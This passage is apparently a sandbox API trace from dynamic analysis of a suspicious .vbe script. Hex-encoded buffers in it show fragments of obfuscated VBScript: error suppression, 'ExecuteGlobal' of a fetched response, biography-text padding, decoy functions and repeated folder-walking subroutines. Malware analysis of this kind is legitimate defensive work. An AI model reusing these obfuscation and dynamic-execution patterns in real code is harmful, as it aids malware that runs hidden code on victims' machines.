x73\x74\x53\x28\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x45\x78\x65\x63\x75\x74\x65\x47\x6c\x6f\x62\x61\x6c\x20\x22\x22\x20\x2b\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x2b\x20\x22\x22\x20\x0d\x0a\x09\x09\x09\x7a\x61\x73\x64\x61\x73\x6f\x6d\x64\x73\x61\x69\x6e\x73\x28\x29\x0d\x0a") returned 7303
	[0200.364] UnmapViewOfFile (lpBaseAddress=0x140000) returned 1
	[0200.364] CloseHandle (hObject=0x110) returned 1
	[0200.364] CloseHandle (hObject=0x10c) returned 1
	[0200.364] GetSystemDirectoryA (in: lpBuffer=0x28eb48, uSize=0x0 | out: lpBuffer="") returned 0x14
	[0200.364] ??2@YAPEAX_K@Z () returned 0x626ed0
	[0200.364] GetSystemDirectoryA (in: lpBuffer=0x626ed0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0200.364] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefdbf0000
	[0200.364] ??3@YAXPEAX@Z () returned 0x721ee701
	[0200.364] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferIdentifyLevel") returned 0x7fefdc0e470
	[0200.364] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefdc0f9b0
	[0200.364] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferCloseLevel") returned 0x7fefdc0f660
	[0200.364] IdentifyCodeAuthzLevelW () returned 0x1
	[0205.754] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28dcc0 | out: lpSystemTimeAsFileTime=0x28dcc0*(dwLowDateTime=0x2dbd68e0, dwHighDateTime=0x1d4ff41)) 
	[0205.754] GetCurrentProcessId () returned 0xb40
	[0205.754] GetCurrentThreadId () returned 0xb44
	[0205.754] GetTickCount () returned 0x3840d
	[0205.754] QueryPerformanceCounter (in: lpPerformanceCount=0x28dcc8 | out: lpPerformanceCount=0x28dcc8*=27920497357) returned 1
	[0205.754] malloc (_Size=0x100) returned 0x627670
	[0205.754] GetVersionExA (in: lpVersionInformation=0x28daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf867f810, dwBuildNumber=0x7fe, dwPlatformId=0xf8670000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x28daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0205.754] GetUserDefaultLCID () returned 0x409
	[0205.754] IsFileSupportedName () returned 0x1
	[0205.754] _wcsicmp (_String1=".vbs", _String2=".vbe") returned 14
	[0205.754] _wcsicmp (_String1=".vbe", _String2=".vbe") returned 0
	[0205.758] GetSignedDataMsg () returned 0x0
	[0205.759] GetCurrentProcess () returned 0xffffffffffffffff
	[0205.759] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x28e300, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28e300*=0x13c) returned 1
	[0205.759] GetFileSize (in: hFile=0x13c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c87
	[0205.759] ??2@YAPEAX_K@Z () returned 0x629a40
	[0205.759] SetFilePointer (in: hFile=0x13c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0205.759] ReadFile (in: hFile=0x13c, lpBuffer=0x629a40, nNumberOfBytesToRead=0x1c87, lpNumberOfBytesRead=0x28e2e0, lpOverlapped=0x0 | out: lpBuffer=0x629a40*, lpNumberOfBytesRead=0x28e2e0*=0x1c87, lpOverlapped=0x0) returned 1
	[0205.759] CoInitialize (pvReserved=0x0) returned 0x1
	[0205.759] CoCreateInstance (in: rclsid=0x7fef867f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef867f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x28e250 | out: ppv=0x28e250*=0x62c0f0) returned 0x0
	[0206.438] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28c450 | out: lpSystemTimeAsFileTime=0x28c450*(dwLowDateTime=0x2dfdae00, dwHighDateTime=0x1d4ff41)) 
	[0206.438] GetCurrentProcessId () returned 0xb40
	[0206.438] GetCurrentThreadId () returned 0xb44
	[0206.438] GetTickCount () returned 0x385b2
	[0206.438] QueryPerformanceCounter (in: lpPerformanceCount=0x28c458 | out: lpPerformanceCount=0x28c458*=27988934825) returned 1
	[0206.438] malloc (_Size=0x100) returned 0x627780
	[0206.439] __dllonexit () returned 0x7fef86214c0
	[0206.439] __dllonexit () returned 0x7fef86214e8
	[0206.439] GetVersionExA (in: lpVersionInformation=0x28c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf8622dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf86214e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x28c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0206.439] GetProcessWindowStation () returned 0x2c
	[0206.439] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x28c218, nLength=0xc, lpnLengthNeeded=0x28c210 | out: pvInfo=0x28c218, lpnLengthNeeded=0x28c210) returned 1
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b6d0
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b720
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b750
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b790
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b7d0
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b810
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b850
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b890
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b8d0
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b910
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b950
	[0206.439] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b9a0
	[0206.439] ??2@YAPEAX_K@Z () returned 0x62b9e0
	[0206.440] DllGetClassObject (in: rclsid=0x390ff0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefe436cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28cf20 | out: ppv=0x28cf20*=0x62b720) returned 0x0
	[0206.440] ??2@YAPEAX_K@Z () returned 0x62b720
	[0206.440] IClassFactory:CreateInstance (in: This=0x62b720, pUnkOuter=0x0, riid=0x28dd00*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x28cf40 | out: ppvObject=0x28cf40*=0x62c0f0) returned 0x0
	[0206.440] ??2@YAPEAX_K@Z () returned 0x62bfe0
	[0206.440] GetSystemInfo (in: lpSystemInfo=0x28cd80 | out: lpSystemInfo=0x28cd80*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0206.440] VirtualQuery (in: lpAddress=0x28cdf0, lpBuffer=0x28cdb0, dwLength=0x30 | out: lpBuffer=0x28cdb0*(BaseAddress=0x28c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0206.440] ??2@YAPEAX_K@Z () returned 0x62c020
	[0206.440] ??2@YAPEAX_K@Z () returned 0x62c040
	[0206.440] ??2@YAPEAX_K@Z () returned 0x62c0a0
	[0206.441] ??2@YAPEAX_K@Z () returned 0x62c0d0
	[0206.441] ??2@YAPEAX_K@Z () returned 0x62c180
	[0206.441] IUnknown:AddRef (This=0x62c0f0) returned 0x2
	[0206.441] IUnknown:Release (This=0x62c0f0) returned 0x1
	[0206.441] IUnknown:Release (This=0x62b720) returned 0x0
	[0206.441] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.441] IUnknown:QueryInterface (in: This=0x62c0f0, riid=0x7fef867f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x28e188 | out: ppvObject=0x28e188*=0x62c0f0) returned 0x0
	[0206.441] IUnknown:Release (This=0x62c0f0) returned 0x1
	[0206.441] _strnicmp (_Str1="<?xml", _Str="'Marj", _MaxCount=0x5) returned 21
	[0206.441] IsTextUnicode (in: lpv=0x629a40, iSize=7303, lpiResult=0x28e1d8 | out: lpiResult=0x28e1d8) returned 0
	[0206.441] GetACP () returned 0x4e4
	[0206.441] malloc (_Size=0x3a0e) returned 0x62c1a0
	[0206.441] GetACP () returned 0x4e4
	[0206.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x629a40, cbMultiByte=7303, lpWideCharStr=0x62c1a0, cchWideChar=7431 | out: lpWideCharStr="\x27\x4d\x61\x72\x6a\x6f\x72\x69\x65\x20\x43\x61\x6d\x65\x72\x6f\x6e\x20\x28\x41\x70\x72\x69\x6c\x20\x32\x33\x2c\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x2c\x20\x70\x6f\x65\x74\x2c\x20\x61\x63\x74\x72\x65\x73\x73\x2c\x20\x61\x6e\x64\x20\x6f\x63\x63\x75\x6c\x74\x69\x73\x74\x2e\x20\x41\x66\x74\x65\x72\x20\x73\x65\x72\x76\x69\x6e\x67\x20\x69\x6e\x20\x74\x68\x65\x20\x6e\x61\x76\x79\x20\x64\x75\x72\x69\x6e\x67\x20\x74\x68\x65\x20\x53\x65\x63\x6f\x6e\x64\x20\x57\x6f\x72\x6c\x64\x20\x57\x61\x72\x2c\x20\x0d\x0a\x27\x73\x68\x65\x20\x73\x65\x74\x74\x6c\x65\x64\x20\x69\x6e\x20\x50\x61\x73\x61\x64\x65\x6e\x61\x2c\x20\x43\x61\x6c\x69\x66\x6f\x72\x6e\x69\x61\x2e\x20\x54\x68\x65\x72\x65\x20\x73\x68\x65\x20\x6d\x65\x74\x20\x74\x68\x65\x20\x72\x6f\x63\x6b\x65\x74\x20\x70\x69\x6f\x6e\x65\x65\x72\x20\x4a\x61\x63\x6b\x20\x50\x61\x72\x73\x6f\x6e\x73\x2c\x20\x77\x68\x6f\x6d\x20\x73\x68\x65\x20\x6d\x61\x72\x72\x69\x65\x64\x20\x69\x6e\x20\x31\x39\x34\x36\x2e\x20\x41\x66\x74\x65\x72\x20\x50\x61\x72\x73\x6f\x6e\x73\x27\x20\x64\x65\x61\x74\x68\x20\x69\x6e\x20\x61\x6e\x20\x65\x78\x70\x6c\x6f\x73\x69\x6f\x6e\x20\x61\x74\x20\x74\x68\x65\x69\x72\x20\x68\x6f\x6d\x65\x20\x69\x6e\x20\x31\x39\x35\x32\x2c\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x20\x63\x61\x6d\x65\x20\x74\x6f\x20\x73\x75\x73\x70\x65\x63\x74\x20\x74\x68\x61\x74\x20\x68\x65\x72\x20\x68\x75\x73\x62\x61\x6e\x64\x20\x68\x61\x64\x20\x62\x65\x65\x6e\x20\x61\x73\x73\x61\x73\x73\x69\x6e\x61\x74\x65\x64\x2c\x20\x61\x6e\x64\x20\x62\x65\x67\x61\x6e\x20\x72\x69\x74\x75\x61\x6c\x73\x20\x74\x6f\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x63\x61\x74\x65\x20\x77\x69\x74\x68\x20\x68\x69\x73\x20\x73\x70\x69\x72\x69\x74\x2e\x20\x53\x68\x65\x20\x77\x61\x73\x20\x70\x61\x72\x74\x20\x6f\x66\x20\x74\x68\x65\x20\x61\x76\x61\x6e\x74\x2d\x67\x61\x72\x64\x65\x20\x61\x72\x74\x69\x73\x74\x69\x63\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x74\x79\x20\x6f\x66\x20\x4c\x6f\x73\x20\x41\x6e\x67\x65\x6c\x65\x73\x3b\x20\x0d\x0a\x27\x61\x6d\x6f\x6e\x67\x20\x68\x65\x72\x20\x66\x72\x69\x65\x6e\x64\x73\x20\x77\x65\x72\x65\x20\x74\x68\x65\x20\x66\x69\x6c\x6d\x6d\x61\x6b\x65\x72\x73\x20\x43\x75\x72\x74\x69\x73\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x20\x61\x6e\x64\x20\x4b\x65\x6e\x6e\x65\x74\x68\x20\x41\x6e\x67\x65\x72\x2e\x20\x53\x68\x65\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x69\x6e\x20\x74\x77\x6f\x20\x6f\x66\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x27\x73\x20\x66\x69\x6c\x6d\x73\x2c\x20\x54\x68\x65\x20\x57\x6f\x72\x6d\x77\x6f\x6f\x64\x20\x53\x74\x61\x72\x20\x61\x6e\x64\x20\x4e\x69\x67\x68\x74\x20\x54\x69\x64\x65\x2c\x20\x61\x73\x20\x77\x65\x6c\x6c\x20\x61\x73\x20\x69\x6e\x20\x0d\x0a\x27\x41\x6e\x67\x65\x72\x27\x73\x20\x66\x69\x6c\x6d\x20\x49\x6e\x61\x75\x67\x75\x72\x61\x74\x69\x6f\x6e\x20\x6f\x66\x20\x74\x68\x65\x20\x50\x6c\x65\x61\x73\x75\x72\x65\x20\x44\x6f\x6d\x65\x2e\x20\x49\x6e\x20\x6c\x61\x74\x65\x72\x20\x79\x65\x61\x72\x73\x2c\x20\x73\x68\x65\x20\x6d\x61\x64\x65\x20\x61\x70\x70\x65\x61\x72\x61\x6e\x63\x65\x73\x20\x69\x6e\x20\x61\x72\x74\x2d\x68\x6f\x75\x73\x65\x20\x66\x69\x6c\x6d\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x62\x79\x20\x4a\x6f\x68\x6e\x20\x43\x68\x61\x6d\x62\x65\x72\x6c\x61\x69\x6e\x20\x61\x6e\x64\x20\x43\x68\x69\x63\x6b\x20\x53\x74\x72\x61\x6e\x64\x2e\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x27\x73\x20\x72\x65\x63\x6f\x67\x6e\x69\x74\x69\x6f\x6e\x20\x61\x73\x20\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x20\x69\x6e\x63\x72\x65\x61\x73\x65\x64\x20\x61\x66\x74\x65\x72\x20\x68\x65\x72\x20\x64\x65\x61\x74\x68\x2c\x20\x61\x6e\x64\x20\x68\x65\x72\x20\x70\x61\x69\x6e\x74\x69\x6e\x67\x73\x20\x77\x65\x72\x65\x20\x73\x68\x6f\x77\x6e\x20\x69\x6e\x20\x65\x78\x68\x69\x62\x69\x74\x69\x6f\x6e\x73\x20\x61\x63\x72\x6f\x73\x73\x20\x74\x68\x65\x20\x63\x6f\x75\x6e\x74\x72\x79\x2e\x20\x28\x46\x75\x6c\x6c\x20\x61\x72\x74\x69\x63\x6c\x65\x2e\x2e\x2e\x29\x20\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x49\x66\x20\x4e\x20\x3c\x20\x32\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x4e\x0d\x0a\x20\x20\x45\x6c\x73\x65\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x31\x29\x20\x2b\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x32\x29\x0d\x0a\x20\x20\x45\x6e\x64\x20\x49\x66\x0d\x0a\x45\x6e\x64\x20\x46\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x6f\x72\x20\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x20\x3d\x20\x31\x20\x54\x6f\x20\x31\x36\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x3d\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x26\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x29\x20\x26\x20\x22\x3b\x20\x22\x0d\x0a\x4e\x65\x78\x74\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x7